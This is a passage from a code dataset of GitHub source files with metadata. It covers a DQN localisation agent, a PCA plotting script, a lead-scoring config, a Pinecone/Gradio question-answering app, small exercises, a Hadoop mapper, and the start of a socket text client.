0\n self.target_q_net.load_state_dict(self.policy_q_net.state_dict())\n self.optimization_steps_since_last_update += 1\n\n # batch of transistions to transitions of batch\n transitions = self.memory.sample(self.batch_size)\n batch = Transition(*zip(*transitions))\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n reward_batch = torch.cat(batch.reward)\n\n # Mask of non-final states\n non_final_mask = torch.tensor(tuple(map(lambda s: s is not None, batch.next_state)), device=self.device,\n dtype=torch.uint8)\n non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])\n\n # Q(s_t, a)\n state_action_values = self.policy_q_net(state_batch).gather(1, action_batch)\n\n # V(s_{t+1}) by older q_net\n 
next_state_values = torch.zeros(self.batch_size, device=self.device)\n next_state_values[non_final_mask] = self.target_q_net(non_final_next_states).max(1)[0].detach()\n\n # E[Q(s_t, a)]\n expected_state_action_values = (next_state_values * self.discount_rate) + reward_batch\n\n # Loss\n loss = F.mse_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n # loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n\n # optimization\n self.optimizer.zero_grad()\n loss.backward()\n # for param in self.policy_q_net.parameters():\n # param.grad.data.clamp_(-1,1)\n self.optimizer.step()\n\n def get_state_from_observation(self, obs):\n index, img, bb = obs\n obs_for_cnn = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().to(self.device) / 255\n features = self.pretrained_cnn(obs_for_cnn)\n return torch.cat((features, self.history.unsqueeze(0)), 1)\n\n def update_history(self, action):\n self.history[self.n_action:] = self.history[:- self.n_action]\n self.history[:self.n_action] = torch.zeros(self.n_action)\n self.history[action] = torch.tensor([1], device=self.device)\n\n def clear_history(self):\n return torch.zeros(self.n_action * self.n_past_action_to_remember, device=self.device)\n\n def train_episode(self, env):\n rewards = []\n self.history = self.clear_history()\n observation = env.reset()\n state = self.get_state_from_observation(observation)\n past_state = state\n done = False\n while not done:\n action = self.get_action(state, env)\n self.update_history(action)\n observation, reward, done, info = env.step(action)\n reward = torch.tensor([reward], device=self.device)\n state = self.get_state_from_observation(observation)\n self.memory.push(past_state, action, state, reward)\n past_state = state\n\n self.optimize_model()\n rewards.append(reward)\n return torch.cat(rewards)\n\n def test_episode(self, env, rand=True):\n timestep_until_last_trigger = 0\n self.history = self.clear_history()\n observation = env.reset(rand)\n state = self.get_state_from_observation(observation)\n done = False\n\n image = copy.deepcopy(env.image)\n bounding_boxes_labels = copy.deepcopy(env.bounding_boxes)\n bounding_boxes_region_proposal = [observation[2]]\n trigger_indexes = []\n\n t = 1\n while not done:\n action = self.get_greedy_action(state)\n self.update_history(action)\n observation, reward, done, info = env.step(action, train = False)\n state = self.get_state_from_observation(observation)\n\n bounding_boxes_region_proposal.append(observation[2])\n\n if action == env.action_space.n - 1:\n trigger_indexes.append(t)\n\n if action <= env.action_space.n - 1:\n timestep_until_last_trigger += 1\n\n if timestep_until_last_trigger == self.timestep_until_last_trigger_treshold:\n obs = env.restart()\n state = self.get_state_from_observation(obs)\n timestep_until_last_trigger = 0\n t += 1\n\n return image, bounding_boxes_labels, bounding_boxes_region_proposal, trigger_indexes\n\n def show_episode(self, env, image_class_index = None):\n temp_image_class_index = env.image_class_index\n if image_class_index != None:\n env.image_class_index = image_class_index\n rand = True if image_class_index == None else False\n\n done = False\n self.history = self.clear_history()\n observation = env.reset(rand)\n state = self.get_state_from_observation(observation)\n\n imgs, actions, rewards, ious = [observation[1]], [-1], [0], [env.past_iou]\n t=0\n\n while not done:\n action = self.get_greedy_action(state)\n self.update_history(action)\n observation, reward, done, info = 
env.step(action, train = True)\n state = self.get_state_from_observation(observation)\n\n\n imgs.append(observation[1])\n actions.append(action.item())\n rewards.append(reward)\n ious.append(env.past_iou)\n t+=1\n if image_class_index != None:\n env.image_class_index = temp_image_class_index\n return imgs, actions, rewards, ious, t\n\n\n","repo_name":"jgsimard/COMP767","sub_path":"project/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9188312374","text":"#!/usr/bin/env python\n\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\neigenvec = np.genfromtxt(\"plink.eigenvec\", dtype = None, encoding = None, names = [\"family_id\", \"sample_id\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"])\n\nfig, ax = plt.subplots()\n\n\nax.scatter(eigenvec[\"1\"], eigenvec[\"2\"])\nax.set_xlabel(\"PC1\")\nax.set_ylabel(\"PC2\")\n# ax.legend()\nax.title.set_text('PCA analysis')\nplt.savefig(\"PC1vs2.png\")\nplt.show()","repo_name":"dlgosk95/qbb2022-answers","sub_path":"week4-homework/gwas_data/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30038101690","text":"import os\nNAME_FILE = 'data.csv'\nFULL_PATH_DATA = os.path.os.getcwd() \n\nREPO_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))\nDATA_DIR = os.path.join(REPO_DIR, 'data')\nFILE_DATA = os.path.join(DATA_DIR, NAME_FILE)\n\nOUTPUTS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../output'))\nOUTPUTS_MODELS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../models'))\n\nPERF_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../lead_scoring_marieme_alessio/domain/perf.txt'))\n\n\n_SAVED_FILENAME = '_processed_data.csv'\nJL = '.joblib'\n\nLOG_REG_SAVED_FILENAME = 'log_reg' + _SAVED_FILENAME\nLOG_REG_MODEL_FILE = 'log_reg' + JL\n\nKNN = 'knn'\nKNN_SAVED_FILENAME = KNN + _SAVED_FILENAME\nKNN_MODEL_FILE = KNN + JL\n\nRF = 'rf'\nRF_SAVED_FILENAME = RF + _SAVED_FILENAME\nRF_MODEL_FILE = RF + JL\n\nSVC = 'svc'\nSVC_SAVED_FILENAME = SVC + _SAVED_FILENAME\nSVC_MODEL_FILE = SVC + JL\n\nGB = 'gb'\nGB_SAVED_FILENAME = GB + _SAVED_FILENAME\nGB_MODEL_FILE = GB + JL\n\n\nINFO_LOG_FILE_NAME = 'lead_scoring_info_log.log'\nDATA_DIR = os.path.join(REPO_DIR, 'logs')\nFILE_LOG = os.path.join(DATA_DIR, INFO_LOG_FILE_NAME)\nLOGGING_FORMAT = '[%(asctime)s][%(levelname)s][%(module)s] - %(message)s'\nLOGGING_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n#FORMAT = '%(asctime)-15s %(clientip)s %(user)-8s %(message)s'\n\n\n#new column names :\nID_CLIENT = 'ID_CLIENT'\nORIGINE_LEAD = 'ORIGINE_LEAD'\nSOURCE_LEAD = 'SOURCE_LEAD'\nNIVEAU_LEAD = 'NIVEAU_LEAD'\nQUALITE_LEAD = 'QUALITE_LEAD'\nCONTACT_PAR_MAIL = 'CONTACT_PAR_MAIL'\nCONTACT_PAR_TELEPHONE = 'CONTACT_PAR_TELEPHONE'\nSTATUT_ACTUEL = 'STATUT_ACTUEL'\nTARGET = 'TARGET'\nNB_VISITES = 'NB_VISITES'\nDUREE_SUR_SITEWEB = 'DUREE_SUR_SITEWEB'\nNB_PAGES_VUES_PAR_VISITE = 'NB_PAGES_VUES_PAR_VISITE'\nDERNIERE_ACTIVITE = 'DERNIERE_ACTIVITE'\nDERNIERE_ACTIVITE_NOTABLE = 'DERNIERE_ACTIVITE_NOTABLE'\nPAYS = 'PAYS'\nVILLE = 'VILLE'\nSPECIALISATION = 'SPECIALISATION'\nTAGS = 'TAGS'\nINDEX_ACTIVITE = 'INDEX_ACTIVITE'\nINDEX_PROFIL = 'INDEX_PROFIL'\nSCORE_ACTIVITE = 'SCORE_ACTIVITE'\nSCORE_PROFIL = 'SCORE_PROFIL'\nANNONCE_VUE = 'ANNONCE_VUE'\nMAGAZINE = 
'MAGAZINE'\nARTICLE_JOURNAL = 'ARTICLE_JOURNAL'\nFORUM = 'FORUM'\nJOURNAUX = 'JOURNAUX'\nPUB_DIGITALE = 'PUB_DIGITALE'\nRECOMMANDATION = 'RECOMMANDATION'\nC_ENT_PARLER_NS = 'C_ENT_PARLER_NS'\nSOUH_TU_REC_INFOS = 'SOUH_TU_REC_INFOS'\nSOUH_REC_MAJ_PROG = 'SOUH_REC_MAJ_PROG'\nSOUH_REC_MAJ_MP = 'SOUH_REC_MAJ_MP'\nSOUH_PAYER_CHEQUE = 'SOUH_PAYER_CHEQUE'\nSOUH_REC_COPIE_LB = 'SOUH_REC_COPIE_LB'\n\nPRED_COL_NAME = 'PREDICTION'\nPRED_PROBA_COL_NAME = 'PREDICTED_PROBABILITY'\n \n\nNEW_COL_NAMES = [\n ID_CLIENT,\n ORIGINE_LEAD,\n SOURCE_LEAD,\n NIVEAU_LEAD,\n QUALITE_LEAD,\n CONTACT_PAR_MAIL,\n CONTACT_PAR_TELEPHONE,\n STATUT_ACTUEL,\n TARGET,\n NB_VISITES,\n DUREE_SUR_SITEWEB,\n NB_PAGES_VUES_PAR_VISITE,\n DERNIERE_ACTIVITE,\n DERNIERE_ACTIVITE_NOTABLE,\n PAYS,\n VILLE,\n SPECIALISATION,\n TAGS,\n INDEX_ACTIVITE,\n INDEX_PROFIL,\n SCORE_ACTIVITE,\n SCORE_PROFIL,\n ANNONCE_VUE,\n MAGAZINE,\n ARTICLE_JOURNAL,\n FORUM,\n JOURNAUX,\n PUB_DIGITALE,\n RECOMMANDATION,\n C_ENT_PARLER_NS,\n SOUH_TU_REC_INFOS,\n SOUH_REC_MAJ_PROG,\n SOUH_REC_MAJ_MP,\n SOUH_PAYER_CHEQUE,\n SOUH_REC_COPIE_LB\n]\n\nCOL_NAME_TRAIN = ['ID_CLIENT', 'ORIGINE_LEAD', 'SOURCE_LEAD', 'NIVEAU_LEAD',\n 'QUALITE_LEAD', 'CONTACT_PAR_MAIL', 'CONTACT_PAR_TELEPHONE',\n 'STATUT_ACTUEL', 'CONVERTI', 'NB_VISITES', 'DUREE_SUR_SITEWEB',\n 'NB_PAGES_VUES_PAR_VISITE', 'DERNIERE_ACTIVITE',\n 'DERNIERE_ACTIVITE_NOTABLE', 'PAYS', 'VILLE', 'SPECIALISATION', 'TAGS',\n 'INDEX_ACTIVITE', 'INDEX_PROFIL', 'SCORE_ACTIVITE', 'SCORE_PROFIL',\n 'ANNONCE_VUE', 'MAGAZINE', 'ARTICLE_JOURNAL', 'FORUM', 'JOURNAUX',\n 'PUB_DIGITALE', 'RECOMMANDATION',\n 'Comment avez-vous entendu parler de nous ?',\n 'Souhaites-tu recevoir plus d\\'infos sur notre cours ?',\n 'Souhaites-tu recevoir des mises à jour sur nos programmes ?',\n 'Souhaites-tu recevoir des mises à jour par message privé ?',\n 'Souhaites-tu payer par chèque ?',\n 'Souhaites-tu recevoir une copie de notre livre blanc ?']\n\nimport re\n\ndef clean_line(line) :\n e = re.compile('[éèê]')\n a = re.compile('[àâ]')\n u = re.compile('[û]')\n o = re.compile('[ô]')\n\n line = e.sub('e', line)\n line = a.sub('a', line)\n line = u.sub('u', line)\n line = o.sub('o', line)\n return line.lower().rstrip().lstrip()\n\n\n\n#############################\n\n\nuse_qualite_lead = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_qualite_lead.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_qualite_lead.append(line)\n\nuse_tags = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_tags.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_tags.append(line)\n\nuse_der_act = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_der_act.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_der_act.append(line)\n\n\n\nCAT_FEAT = [QUALITE_LEAD, TAGS, DERNIERE_ACTIVITE]\n\nuse_lists = [\n use_qualite_lead,\n use_tags,\n use_der_act,\n]\n\nNUM_FEAT =[DUREE_SUR_SITEWEB, NB_VISITES]\n\nFEATURES = CAT_FEAT + NUM_FEAT\nCOLS_TO_KEEP = FEATURES + [TARGET]","repo_name":"alex-toy/lead_scoring","sub_path":"lead_scoring_marieme_alessio/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"73550215219","text":"import gradio as gr\n#from langchain.document_loaders import UnstructuredPDFLoader\nfrom 
langchain.document_loaders import PyPDFLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n#from langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nimport pinecone\nimport requests\nimport sys\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain import PromptTemplate\nfrom langchain import HuggingFaceHub\nfrom PyPDF2 import PdfReader\n#from langchain.document_loaders import TextLoader\nfrom pathlib import Path\nfrom time import sleep\nimport os\nimport random\nimport string\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef generate_random_string(length):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length)) \nrandom_string = generate_random_string(8)\n\nfile_path = os.path.join(os.getcwd(), \"valuation.pdf\")\n#loader = PyPDFLoader(file_path)/ PyPDFLoader(\"60LEADERSONAI.pdf\")\n#data = loader.load()\n#db_texts = text_splitter.split_documents(data)\n\ndata = PdfReader(file_path)\nraw_text = ''\ndb_texts=''\nfor i, page in enumerate(data.pages):\n text = page.extract_text()\n if text:\n raw_text += text\n text_splitter = RecursiveCharacterTextSplitter( \n# separator = \"\\n\",\n chunk_size = 1000,\n chunk_overlap = 100,\n length_function = len,\n )\n db_texts = text_splitter.split_text(raw_text)\n\nclass HFEmbeddings:\n def __init__(self, api_url, headers):\n self.api_url = api_url\n self.headers = headers\n def get_embeddings(self, texts):\n response = requests.post(self.api_url, headers=self.headers, json={\"inputs\": texts, \"options\": {\"wait_for_model\": True}})\n embeddings = response.json()\n return embeddings\n def embed_documents(self, texts):\n embeddings = self.get_embeddings(texts)\n return embeddings\n def __call__(self, texts):\n return self.embed_documents(texts)\n\nHUGGINGFACEHUB_API_TOKEN = os.getenv('HUGGINGFACEHUB_API_TOKEN')\nmodel_id = os.getenv('model_id')\nhf_token = os.getenv('hf_token')\nrepo_id = os.getenv('repo_id')\n\napi_url = f\"https://api-inference.huggingface.co/pipeline/feature-extraction/{model_id}\"\nheaders = {\"Authorization\": f\"Bearer {hf_token}\"}\n\nhf_embeddings = HFEmbeddings(api_url, headers)\n\nPINECONE_API_KEY = os.getenv('PINECONE_API_KEY')\nPINECONE_ENVIRONMENT = os.getenv('PINECONE_ENVIRONMENT')\nPINECONE_INDEX_NAME = os.getenv('PINECONE_INDEX_NAME')\n\npinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\nindex_name = PINECONE_INDEX_NAME\nnamespace = random_string\n\nvector_db = Pinecone.from_texts(db_texts, hf_embeddings, index_name=index_name, namespace=namespace)\nprint(\"Pinecone Vector/Embedding DB Ready.\")\n\nindex_name_extracted=pinecone.list_indexes()\nindex_current = pinecone.Index(index_name=index_name)\nindex_status=index_current.describe_index_stats() \n\nllm = HuggingFaceHub(repo_id=repo_id,\n model_kwargs={\"min_length\":100,\n \"max_new_tokens\":1024, \"do_sample\":True,\n \"temperature\":0.1,\n \"top_k\":50,\n \"top_p\":0.95, \"eos_token_id\":49155})\nprompt_template = \"\"\"You are a very helpful AI assistant. Please ONLY use the given context to answer the user's input question. 
If you don't know the answer, just say that you don't know.\nContext: {context}\nQuestion: {question}\nHelpful AI Repsonse:\n\"\"\"\nPROMPT = PromptTemplate(template=prompt_template, input_variables=[\"context\", \"question\"])\nchain = load_qa_chain(llm=llm, chain_type=\"stuff\", prompt=PROMPT)\n\ndef run_chain(user_query):\n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\n index_name_extracted=pinecone.list_indexes()\n index_current = pinecone.Index(index_name=index_name)\n index_status=index_current.describe_index_stats()\n if user_query !=\"\" and not user_query.strip().isspace() and not user_query.isspace():\n print(\"Your query:\\n\"+user_query)\n vector_db_from_index = Pinecone.from_existing_index(index_name, hf_embeddings, namespace=namespace)\n ss_results = vector_db_from_index.similarity_search(query=user_query, namespace=namespace, k=5)\n initial_ai_response = chain.run(input_documents=ss_results, question=user_query, return_only_outputs=True) \n #initial_ai_response=chain({\"input_documents\": ss_results, \"question\": user_query}, return_only_outputs=True) \n temp_ai_response = initial_ai_response.partition('<|end|>')[0]\n final_ai_response = temp_ai_response.replace('\\n', '')\n print(\"final_ai_response:\"+final_ai_response)\n return final_ai_response\n else:\n print(\"Invalid inputs.\") \n\ndef delete_index_namespace(): \n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\n index_name_extracted=pinecone.list_indexes()\n index_current = pinecone.Index(index_name=index_name)\n index_status=index_current.describe_index_stats() \n index_namespace_to_delete = pinecone.Index(index_name=index_name)\n index_namespace_to_delete.delete(delete_all=True, namespace=namespace)\n print(\"Pinecone Index Namespace: \"+namespace+\" has been deleted!\")\n \nwith gr.Blocks() as demo:\n gr.Markdown(\"Enter your question below & click Get AI Response. 
Remember to clear data before exiting program.\")\n    with gr.Row():\n        user_query = gr.Textbox(label=\"User query input box\", placeholder=\"Enter your query here.\")\n        ai_response = gr.Textbox(label=\"AI Response display area\", placeholder=\"AI Response to be displayed here.\")\n    query_btn = gr.Button(\"Get AI Response\")\n    ai_res_btn = gr.Button(\"Clear Data & Exit\")\n    query_btn.click(fn=run_chain, inputs=user_query, outputs=ai_response)\n    ai_res_btn.click(fn=delete_index_namespace)\n\ndemo.launch()\n","repo_name":"BinqiangLiu/hf_gradio_pinecone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"36539003105","text":"# input\nN = int(input())\n\n# dynamic programming\ndp = [ None ] * (N + 1)\nfor i in range(N + 1):\n\tif i <= 1:\n\t\tdp[i] = 1\n\telse:\n\t\tdp[i] = dp[i - 1] + dp[i - 2]\n\n# print the answer\nprint(dp[N])\n","repo_name":"wikibook/algorithm-math","sub_path":"본문/python/Code_3_07_2.py","file_name":"Code_3_07_2.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"ko","doc_type":"code","stars":7,"dataset":"github-code","pt":"57"}
{"seq_id":"42666382014","text":"import paths\nfrom astropy import coordinates\nimport pylab as pl\nimport spectral_cube\nfrom spectral_cube import SpectralCube\nimport os\nfrom scipy import ndimage\nimport itertools\nfrom astropy.io import fits\nimport radio_beam\nimport numpy as np\nfrom astropy import units as u\nimport pyregion\nimport image_tools\nfrom astropy import wcs\n\nimport re\nimport glob\n\n\ndef extract_radial_spectrum(cube, coordinate, excludemask, radial_bins=[(0,1),(1,2)]):\n\n\n    yy,xx = np.indices(cube.shape[1:])\n    rr = ((yy-coordinate[1])**2 + (xx-coordinate[0])**2)**0.5\n\n    spectra = {}\n    for inner_bin_radius,outer_bin_radius in radial_bins:\n        radial_mask = (rr > inner_bin_radius) & (rr < outer_bin_radius)\n        radial_mask &= ~excludemask\n\n        avspec = cube.with_mask(radial_mask).mean(axis=(1,2))\n\n        spectra[(inner_bin_radius,outer_bin_radius)] = avspec\n\n    return spectra\n\ndef spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate):\n    cube = SpectralCube.read(cubefn)\n\n    pixcoordinate = cube.wcs.celestial.wcs_world2pix(coordinate.ra.deg,\n                                                     coordinate.dec.deg,\n                                                     0)\n\n    pixscale = (cube.wcs.celestial.pixel_scale_matrix.diagonal()**2).sum()**0.5\n\n    includemask = reg.get_mask(header=cube.wcs.celestial.to_header(),\n                               shape=cube.shape[1:])\n\n\n    spectra = extract_radial_spectrum(cube, pixcoordinate, ~includemask,\n                                      radial_bins=bins_arcsec/(pixscale*3600))\n\n    return spectra\n\nif __name__ == \"__main__\":\n\n\n    for sourcename,pfx,regfn in (('e2','e2e','e2_exclude_e2w.reg'),\n                                 ('e8','e8','e8_core.reg'),\n                                 ('north','north','north_core.reg')):\n\n        #coordinate = coordinates.SkyCoord(\"19:23:43.961\",\n        #                                  \"+14:30:34.56\",\n        #                                  frame='fk5',\n        #                                  unit=(u.hour, u.deg))\n        bins_ends_arcsec = np.linspace(0,2.25,7)\n        bins_arcsec = np.array(list(zip(bins_ends_arcsec[:-1], bins_ends_arcsec[1:])))\n        reg = pyregion.open(paths.rpath(regfn))\n        coordinate = coordinates.SkyCoord(reg[0].coord_list[0],\n                                          reg[0].coord_list[1],\n                                          frame='fk5',\n                                          unit=(u.deg, u.deg))\n\n\n        for spw in (0,1,2,3):\n            for suffix in ('','_hires'):\n\n                cubefn = paths.dpath('merge/fullcube_cutouts/{2}cutout_full_W51_7m12m_spw{0}{1}_lines.fits'\n                                     .format(spw,suffix,sourcename))\n                print(cubefn)\n\n                spectra = spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate)\n\n                for bins, (key, spectrum) in zip(bins_arcsec, spectra.items()):\n                    if hasattr(spectrum, 
'beams'):\n include = np.isfinite(spectrum) & np.array([(bm.major < 1*u.arcsec) &\n (bm.minor < 1*u.arcsec)\n for bm in spectrum.beams])\n assert include.any()\n avg_beam = spectral_cube.cube_utils.average_beams(spectrum.beams,\n includemask=include)\n assert not np.isnan(avg_beam)\n spectrum.meta['beam'] = avg_beam\n spectrum.write(paths.merge_spath('{4}_radial_bin_{0:0.2f}to{1:0.2f}_7m12m_spw{2}{3}.fits'\n .format(bins[0], bins[1], spw,\n suffix, pfx)),\n overwrite=True\n )\n\n for spw in (0,1,2,3):\n\n cubefn = paths.dpath('12m/fullcube_cutouts/{1}cutout_full_W51_spw{0}_lines.fits'\n .format(spw, sourcename))\n print(cubefn)\n\n spectra = spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate)\n\n pl.figure(1).clf()\n\n for bins, (key, spectrum) in zip(bins_arcsec, spectra.items()):\n if hasattr(spectrum, 'beams'):\n include = np.isfinite(spectrum) & np.array([(bm.major < 1*u.arcsec) &\n (bm.minor < 1*u.arcsec)\n for bm in spectrum.beams])\n avg_beam = spectral_cube.cube_utils.average_beams(spectrum.beams,\n includemask=include)\n spectrum.meta['beam'] = avg_beam\n spectrum.write(paths.spath('{3}_radial_bin_{0:0.2f}to{1:0.2f}_spw{2}.fits'\n .format(bins[0], bins[1], spw, pfx)),\n overwrite=True\n )\n\n\n pl.plot(spectrum.spectral_axis.to(u.GHz).value, spectrum.value,\n label='{0:0.1f}-{1:0.1f}'.format(*bins))\n\n pl.xlabel(\"Frequency (GHz)\")\n pl.ylabel(\"Intensity (Jy)\")\n pl.gca().ticklabel_format(useOffset=False)\n pl.gca().get_xaxis().get_major_formatter().set_scientific(False)\n pl.gca().get_yaxis().get_major_formatter().set_scientific(False)\n \n pl.legend(loc='best')\n pl.savefig(paths.fpath('radial_spectra/{1}_radial_spectra_spw{0}.png'\n .format(spw, pfx)))\n","repo_name":"keflavich/W51_ALMA_2013.1.00308.S","sub_path":"analysis/radial_spectra.py","file_name":"radial_spectra.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"1456628420","text":"import sys\nimport os\ncode_dir = os.getenv(\"TRANSFOREST\")\nsys.path.append(code_dir+'/scripts/')\nfrom shell_helpers import *\nfrom encode import *\nfrom itertools import *\n\nclass Mapper(object):\n def __init__(self):\n self.shell = ShellRunner({})\n self.shell.make_local_tmp_dir()\n\n # transforest code directory\n self.shell.subs[\"TRANSFOREST\"] = os.getenv(\"TRANSFOREST\")\n \n self.shell.subs[\"PYTHON\"] = os.getenv(\"PYTHON\")\n\n self.shell.subs[\"TMP_FILE\"] = self.tmp_file = self.shell.tmpdir + \"forests\"\n \n \n def __call__(self, data):\n self.min_key = 1e90\n def get_vals():\n for key, value in data:\n self.min_key = min(self.min_key, key)\n print >>sys.stderr, \"key\", key\n print >> sys.stderr, value[0:10], value.split(\"\\t\", 1)[1][0:10]\n yield value\n\n tmp_handle = open(self.tmp_file, 'w')\n for l in decode(get_vals()):\n print >>sys.stderr, \"print\"\n print >>tmp_handle, l\n tmp_handle.close()\n \n # Oracle-ize the forst\n print >>sys.stderr, os.getenv(\"PYTHONPATH\")\n self.shell.call(\"export PYTHONPATH=%s;cd $TRANSFOREST; cat $TMP_FILE | $PYTHON $TRANSFOREST/Features/oracle.py -w $TRANSFOREST/example/config.ini --lm $TRANSFOREST/example/lm.3.sri --order 3 $LOCAL_TMPDIR/oracle\"% os.getenv(\"PPATH\"))\n\n # Add Features to oracle forst\n self.shell.call(\"export PYTHONPATH=%s;cd $TRANSFOREST; $PYTHON $TRANSFOREST/Features/add_features.py $LOCAL_TMPDIR/oracle $LOCAL_TMPDIR/oracle_features\"%os.getenv(\"PPATH\"))\n\n # Add features to the main sentence\n self.shell.call(\"export PYTHONPATH=%s;cd 
$TRANSFOREST; $PYTHON $TRANSFOREST/Features/add_features.py $TMP_FILE $LOCAL_TMPDIR/features\"%os.getenv(\"PPATH\"))\n\n        for i,(l1,l2) in enumerate(izip(encode(self.shell.open(\"$LOCAL_TMPDIR/features\")),\n                                        encode(self.shell.open(\"$LOCAL_TMPDIR/oracle_features\")))):\n            yield int(l1.split(\"\\t\",1)[0]), l1 + \"****\" + l2\n\n\ndef starter(program): \n    program.addopt(\"cmdenv\",\"PYTHON=%s\"%os.getenv(\"PYTHON\"))\n    program.addopt(\"cmdenv\",\"TRANSFOREST=%s\"%os.getenv(\"TRANSFOREST\"))\n    program.addopt(\"cmdenv\",\"LD_LIBRARY_PATH=%s\"%os.getenv(\"LD_LIBRARY_PATH\"))\n    program.addopt(\"cmdenv\",\"PPATH=%s\"%os.getenv(\"PYTHONPATH\"))\n    \ndef runner(job): \n    import dumbo\n    dumbo.run(Mapper)\n\n\nif __name__ == \"__main__\":\n    import dumbo\n    dumbo.main(runner,starter)\n    \n","repo_name":"srush/tf-fork","sub_path":"hadoop_scripts/oracle_parses.py","file_name":"oracle_parses.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"}
{"seq_id":"33953913098","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# imports###############\nimport json\nimport sys\n###############################\n\n\nclass NewsDataReader:\n    def __init__(self, fromtxt, tocsv, number_of_lines=None, row_lines=None):\n\n        self.number_of_lines = 1000000  # number of rows to read\n        self.row_lines = 16  # number of lines containing one row\n        self.fromtxt = fromtxt\n        self.tocsv = tocsv\n\n    # read a multiple lines in txt file and convert it to a dictionary in python\n    def read_row(self, f):\n        row = ''\n        opens = 0\n\n        while True:\n            readed = f.readline()\n            if ('{\\n' in readed) or ('\": {\\n' in readed):\n                opens += 1\n            if ('},\\n' in readed) or ('}\\n' in readed):\n                opens -= 1\n\n            row = row + readed\n\n            if opens == 0:\n                break\n        try:\n            row_json = json.loads(row)\n        except Exception as e:\n            print(row)\n            raise e\n        return row_json\n\n    def read(self):\n        # load txt file row by row and extract each row from json format, then converts to csv format\n        with open(self.fromtxt, 'r') as f:\n            with open(self.tocsv, 'w') as csvf:\n                # create the csv writer\n                row = self.read_row(f)\n\n                for line_row in range(self.number_of_lines):\n                    try:\n                        row = self.read_row(f)\n                        # write a row to the csv file\n                        row = json.dumps(row) + '\\n'\n                        csvf.write(row)\n                        if line_row % 1000 == 0:\n                            print(line_row)\n\n                    except Exception as e:\n                        print(e)\n                        break\n\n\nif __name__ == '__main__':\n\n    fromtxt = '../resources/ferdowsi-data/Spad/ferdowsi-data.txt'\n    tocsv = '../resources/ferdowsi-data/Spad/out.log'\n    if len(sys.argv) > 1:\n        fromtxt = sys.argv[1]\n        tocsv = sys.argv[2]\n\n    reader = NewsDataReader(fromtxt=fromtxt, tocsv=tocsv)\n    print(\"started\")\n    reader.read()\n    print(\"successfully was read\")\n","repo_name":"fahim1377/search-engine","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"35589578431","text":"import socket, threading\n\n\nHEADER_SIZE = 64\n\n\ndef send_text(sock: socket.socket, text: str):\n    \"\"\"Send text to server.\"\"\"\n    payload = text.encode('utf8')\n    header = f'{len(payload):<{HEADER_SIZE}}'.encode('utf8')\n    sock.sendall(header + payload)\n\ndef receive_text(sock: socket.socket) -> str:\n    \"\"\"Receive text from server.\"\"\"\n    header = sock.recv(HEADER_SIZE)\n    while len(header) < HEADER_SIZE:\n        header += sock.recv(HEADER_SIZE - len(header))\n    payload_size = int(header.decode('utf8').strip())\n\n    payload = 
